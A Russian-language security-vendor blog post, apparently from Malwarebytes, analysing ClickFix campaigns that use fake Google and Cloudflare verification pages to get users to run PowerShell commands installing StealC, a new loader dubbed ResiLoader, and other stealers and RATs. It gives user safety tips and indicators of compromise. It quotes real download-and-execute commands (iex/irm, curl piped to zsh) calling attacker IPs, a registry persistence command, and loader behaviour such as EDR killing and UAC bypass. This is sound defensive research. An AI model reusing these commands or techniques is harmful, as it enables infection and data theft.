Атаки типа ClickFix, в ходе которых пользователей обманом заставляют самостоятельно выполнять вредоносные команды, продолжают развиваться. В рамках этой последней кампании используются поддельные страницы подтверждения от Google и Cloudflare, чтобы убедить жертв заразить свои собственные устройства.
Одна-единственная ошибка может привести к установке вредоносного ПО, которое похищает пароли и другие конфиденциальные данные, предоставляет злоумышленникам удаленный доступ к вашему компьютеру или загружает дополнительное вредоносное ПО, способное полностью взять под контроль вашу систему.
Нам удалось выявить несколько кампаний, в которых для распространения вредоносного ПО использовалась одна и та же инфраструктура, в том числе HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport и программа-крадец на базе Rust.
В одной из цепочек заражения троянская версия легитимного мессенджера Franz загружает ранее не зафиксированный загрузчик под названием ResiLoader, который отключает средства защиты, а затем запускает программу-крадун StealC.
Прежде чем перейти к техническим деталям, давайте разберемся, как не стать следующей жертвой.
Как оставаться в безопасности
Атаки ClickFix основаны на том, чтобы убедить вас самостоятельно запустить команды. Самый безопасный подход прост:
- Никогда не копируйте и не запускайте команды с веб-сайта, если только вы не следуете инструкциям из надежного источника и точно не понимаете, что делает данная команда.
- Будьте осторожны с страницами проверки. Google, Cloudflare, Microsoft и другие легитимные сервисы никогда не будут просить вас вставлять команды PowerShell в Windows подтвердить, что вы человек, или устранить какую-либо проблему.
- Не позволяйте срочности заставить вас поспешить. На поддельных страницах подтверждения часто используются таймеры обратного отсчёта, счетчики посетителей или предупреждения, чтобы подтолкнуть вас к быстрому принятию решения.
- Обновляйте свое программное обеспечение для защиты. Защита в режиме реального времени и веб-защита помогут заблокировать вредоносные сайты, прежде чем вы перейдете на них.
- Сомневайтесь в неожиданных технических инструкциях. Если на веб-сайте вам предлагают запустить PowerShell, командную строку или терминал, остановитесь и проверьте эти инструкции через официальные каналы поддержки компании.
Совет от профессионала: Malwarebytes Browser Guard может предупредить вас, когда веб-сайт пытается скопировать контент в ваш буфер обмена — это распространённый трюк, используемый страницами ClickFix.
Технический анализ
Кампании, проанализированные в рамках данного исследования, действуют, по крайней мере, с конца 2025 года и используют различные поддельные страницы Google и Cloudflare для распространения вредоносного ПО. Несмотря на различия в приманках, они в значительной степени используют одну и ту же инфраструктуру и цепочку заражения, при этом злоумышленники постоянно тестируют новые методы доставки и полезные нагрузки.
Разные приманки — одна цель
Большинство кампаний имеют ряд общих черт:
- Использование папки
C:\ProgramData\Zoomsдля извлечения последующих этапов - Команды PowerShell ClickFix, построенные по схожим шаблонам
- Использование хранилищ Cloudflare R2 для доставки полезных данных
- IP-адреса, обслуживаемые компанией ASN Dedik Services Limited
- HTML-ответы, содержащие только эту фразу
"hehe"
Эти показатели со временем менялись, поэтому они встречаются не во всех цепочках заражения. Кампании продолжают развиваться: регулярно появляются новые вредоносные нагрузки и способы их доставки. Например, в некоторых случаях для распространения вредоносной нагрузки вместо хранилищ используются непосредственно IP-адреса.
Последняя команда, скопированная пользователем, обычно соответствует следующему шаблону:
powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”
В проанализированных случаях порт и путь не всегда указаны; порты выбираются случайным образом, однако среди используемых встречаются следующие: 6600, 9900, 5506, 7895, 7493, 149, 8442.
Для выполнения этих команд используются несколько шаблонов, связанных с ClickFix, в основном относящихся к Google и Cloudflare. Мы также обнаружили, что в некоторых случаях команда PowerShell распространялась через фреймворк IClickFix.
Мы заметили, что эти рекламные кампании ClickFix распространяются через:
- Старые веб-сайты, срок действия которых, вероятно, истек и которые были выкуплены злоумышленником (злоумышленниками).
- CloudFlare Pages (
.pages.devдомены). - Сайты, подвергшиеся взлому.
- Поддельные сервисы, например, связанные с QR-кодами или доступом к файлам в Интернете.
Рекламные объявления Google ClickFix
Участники этих кампаний используют различные HTML-страницы и наборы инструментов, связанные с Google.
Одна из уловок имитирует проверку Google reCAPTCHA. Страницы размещены на случайных URL-адресах, на которых отображается поддельный или вредоносный контент. Эти домены зачастую являются старыми регистрациями, которые недавно начали разрешаться на новые IP-адреса, что позволяет предположить, что они были перепрофилированы для проведения этой кампании.
На некоторых из этих страниц присутствуют такие параметры URL, как «zoneid», «cost», «device», «country», «clickid», например:
/conf/captcha.html?zoneid=10420852/wincapbot/nobot.html/xmr/trkuste.php?zone=5327134bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop


В данном случае функции, связанные с ClickFix, реализованы в классе CustomCaptcha. Команда представлена в открытом виде без какого-либо зашифрования.

Еще один способ распространения предполагает использование Cloudflare Pages, размещенного на .pages.dev поддомены.

В данном случае HTML-страница подвергается обфускации путем объявления нескольких переменных и применения к ним операции XOR. Деобфускация кода называется SECURITY GATEWAY и состоит из следующих функций: GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, и PanelController.
Этот код позволяет злоумышленникам извлекать команду как удаленно, так и локально. В данном примере вредоносная команда PowerShell хранится локально.

Мы также обнаружили, что некоторые из этих доменов ранее распространяли другую ловушку, в данном случае связанную с несанкционированным входом в аккаунт Google. Эта ловушка ClickFix предлагает пользователю скопировать и вставить вредоносную команду, чтобы установить своё устройство в качестве основного.

Интересная особенность этого набора ClickFix заключается в том, что он оснащён «механизмом авторизации», как описано в комментариях, и что злоумышленник должен вручную выбрать на панели, какую команду необходимо заставить пользователя выполнить.


В ходе недавних кампаний мы обнаружили приманку ClickFix, связанную с Google Meet, в которой пользователю предлагается скопировать и вставить вредоносную команду для устранения проблем со звуком.

В проанализированных случаях конечная точка /api/driver-clipboard.php вернула следующую вредоносную команду:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}
Другие приманки
Участники этой кампании используют различные наборы инструментов и приманки, в основном связанные с Google. Однако мы обнаружили и другие приманки, в которых были скопированы команды, относящиеся к той же инфраструктуре.
Злоумышленники, стоящие за этими кампаниями, также взламывают множество веб-сайтов, используя различные шаблоны, связанные с приманкой CloudFlare ClickFix.


Мы обнаружили несколько шаблонов, используемых для страниц CloudFlare. В проанализированных случаях эта команда присутствует в открытом виде или, в некоторых случаях, в зашифрованном виде.



Мы также обнаружили несколько специально созданных поддельных веб-сайтов, предлагающих различные услуги. Например, сайт «My QR Generator» отображает зашифрованный QR-код и просит пользователя запустить команду PowerShell, чтобы подтвердить, что он не робот.

В данном случае команда закодирована в кодировке base-64:

Программа для загрузки PowerShell
Команда ClickFix, запущенная пользователем, декодирует скрипт и помещает его в папку Temp под именем tmp{4 char}.tmp.ps1.
Нам удалось обнаружить несколько вариантов этого скрипта, однако последние версии выполняют следующие действия:
- Создать папку
C:\ProgramData\Zooms. - Загрузите следующий этап из хранилища CloudFlare и сохраните его в
C:\ProgramData\Zooms. В некоторых вариантах скрипта следующий этап загружается напрямую с IP-адреса. - Отправьте информацию о скомпрометированном компьютере по адресу
http://{IP}/dl-callback. В некоторых вариантах сценария эта часть отсутствует.

Злоумышленники, стоящие за этими кампаниями, используют большое количество различных полезных нагрузок. В рамках этих кампаний распространяется широкий спектр полезных нагрузок. В приведенной ниже таблице представлены названия некоторых загружаемых файлов и вредоносное ПО, которое они устанавливают. Во многих из проанализированных случаев конечная полезная нагрузка распространялась с помощью метода «DLL Hijacking», как мы также увидим позже на примере стелера StealC.
| Файл распространен | Распространение вредоносного ПО |
libEGL.zip, Safe-1.zip | Троянизированное приложение Electron, ResiLoader и StealC |
Test.msi | Deno Loader и PowerShell Stealer |
arworks.zip | Amatera Stealer |
water-night.zip | Ремус Стилер |
Setup.msi, Invintrum_first.msi | NetSupport |
traffic1.msi | CastleLoader |
ibrowser.exe | «Похититель ржавчины» |
Мы проанализировали новый загрузчик под названием ResiLoader, который в конечном итоге распространяет вредоносное ПО StealC. Кроме того, мы обнаружили, что в ходе последних кампаний злоумышленник начал использовать Deno для распространения разработанного на PowerShell стелера; анализ этой цепочки заражения может стать темой одного из будущих постов в блоге.
Приложение Electron с троянским кодом загружает ResiLoader
В данном случае ZIP-файл был загружен с:
pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
После вывода в:
C:\ProgramData\Zooms\libEGL.zip_ext
Архив содержит троянскую версию приложения с открытым исходным кодом для обмена сообщениями под названием «Franz»:

Вредоносный код реализован в index.js файл:

Программа для загрузки выполняет следующие операции:
- Декодируйте строки с помощью функции
HC(). - Читает
readme.txt, ожидает ключ кампании следующего вида:AAAA-BBBB, возвращает его в виде массива токенов. В данном случае имя —resiloader-1и именно так мы называем загруженную DLL — «ResiLoader». - Читает
%APPDATA%\setup.txt; если этот параметр отсутствует, генерируется случайная строка длиной 8 символов и сохраняется. - Обеспечение сохранности данных с помощью
app.setLoginItemSettings. - Отправляет запрос POST на
https[:]//completstep[.]com/api/и сформировать ответ в формате JSON- Если
task.eесли он присутствует, то выполняетсяeval(task.e); это позволяет злоумышленнику выполнить произвольный код JavaScript. - Если
task.filesесли есть, создать%TEMP%\<Date.now()>\, декодировать и записать каждый файл; если имя какого-либо файла заканчивается на.exe, запустите его черезchild_process.exec.
- Если
В нашем случае мы получили ZIP-архив, который осуществляет перехват DLL-файла ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{
"msys-2.0.dll":"<base64>",
"msys-crypto-3.dll":"<base64>",
"msys-gcc_s-seh-1.dll":"<base64>",
"ssh-add.exe":"<base64>" }}}
Затем исполняемый файл был запущен с помощью команды:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe""
ResiLoader
Сайт msys-crypto-3.dll представляет собой зашифрованный .NET NativeAOT loader который обходит антивирусные программы и системы обнаружения угроз (AV/EDR) с помощью метода BYOD, обеспечивает постоянное присутствие в системе и в конечном итоге загружает программу-крадушку StealC. Мы не обнаружили конкретных данных, позволяющих установить авторство этого загрузчика, поэтому назвали его «ResiLoader» на основании строки, присутствовавшей в предыдущих readme.txt.
Загрузчик содержит несколько строк: одни из них в открытом виде, а другие — в зашифрованном. После расшифровки этих строк можно составить полное представление о функциональных возможностях ResiLoader.
MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=
Загрузчик выполняет следующие операции:
- Извлеките закодированный блок данных, содержащий два полезных нагрузки, считывая маркер
AtLorenBaseи длину закодированного блока данных. Затем он декодирует этот блок и расшифровывает драйверpcdhost.sys(OPSWAT
(драйвер AppRemover) и полезную нагрузку StealC с помощью собственного алгоритма дешифрования. - Завершите более 140 процессов, связанных с EDR/AV, с помощью удаленного драйвера.
- Обойти UAC с помощью
ICMLuaUtilРасширенный интерфейс COM. - Создать папку
C:\ProgramData\Google Update, копируя себя; обеспечивая постоянное хранение с помощью ключа реестра RUN cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe
В итоге загрузчик выполняет «выемку» процесса ServiceModelReg.exe для запуска программы-крадец StealC.
МНК
Хеш
72907d0ca3258365838626f6a8d993a6: DLL-файл ResiLoader
0234E3188F2883A438B3F2BEAB7A78B2: StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516: Ремус
206ce339febca0c3bcc850f42595fc63: Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT
b8d53740024d126cb55f83854335a4ab: «Похититель ржавчины»
Домены
Распространение страниц ClickFix:
onegeekworld[.]com
thefirmos[.]com
antibotv3[.]com
centralwildcats[.]com
cloud.antibotv3[.]com
cloudautosolutions[.]com
sunseekersupply[.]com
123clocks[.]com
orcanegames[.]com
rwmonitoring[.]com
100furniture[.]com
nepalcharchaa[.]com
p-floribunds.pages[.]dev
pg-altirade2.pages[.]dev
pg-cordivant-m6.pages[.]dev
g-luminence.pages[.]dev
generator-qrcode[.]online
regdev-google[.]com
khosla[.]capital
eorgke09054909j[.]com
dropboxi[.]com
Контейнеры CloudFlare, используемые для распространения полезных данных:
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-620528e2dc874e16937673265aa23d39.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-9682d5896df841679c5a17eb41273f89.r2[.]dev
pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev
pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
unitedstateverif[.]com: распределение полезной нагрузки
bigflaredefence[.]com: распределение полезной нагрузки
popularcard[.]shop: C2-сервер «Rust Stealer»
xzz[.]proxygrid[.]cc: Amatera Stealer C2
completstep[.]com: Загрузчик C2
eventlogerps1[.]ink: Deno Loader
be231ro963[.]com: Deno Loader
IP-адреса
IP-адрес, используемый для распространения полезных данных:
151.240.151[.]126
85.239.149[.]16
85.239.149[.]40
93.152.224[.]29
151.240.151[.]46
93.152.224[.]167
85.239.149[.]78
192.69.195[.]131
135.181.171[.]40
94.26.83[.]206
91.92.34[.]128
85.239.144[.]31
93.152.224[.]39
94.26.90[.]112
146.19.248[.]120: StealC C2
Благодарности
- Сообщение о связанном домене: https://x.com/stop_spammerz/status/2070152741037477960
- Сообщение о связанном домене: https://x.com/Yuki27183/status/2047354005605777850
- Сообщение о заражении пользователя на Reddit: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/
- Возможная цепочка заражения: https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026




